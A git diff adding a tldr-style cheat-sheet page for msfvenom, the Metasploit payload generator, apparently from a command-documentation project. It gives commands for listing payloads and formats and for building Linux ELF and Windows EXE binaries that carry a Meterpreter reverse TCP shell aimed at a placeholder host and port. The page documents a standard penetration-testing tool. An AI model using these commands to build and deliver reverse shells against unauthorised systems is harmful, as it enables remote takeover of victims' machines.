diff --git a/pages/common/msfvenom.md b/pages/common/msfvenom.md new file mode 100644 index 0000000000..e6f298a281 --- /dev/null +++ b/pages/common/msfvenom.md @@ -0,0 +1,24 @@ +# msfvenom + +> Manually generate payloads for metasploit. +> More information: . + +- List payloads: + +`msfvenom -l payloads` + +- List formats: + +`msfvenom -l formats` + +- Show payload options: + +`msfvenom -p {{payload}} --list-options` + +- Create an ELF binary with a reverse TCP handler: + +`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > {{path/to/binary}}` + +- Create an EXE binary with a reverse TCP handler: + +`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > {{path/to/binary.exe}}`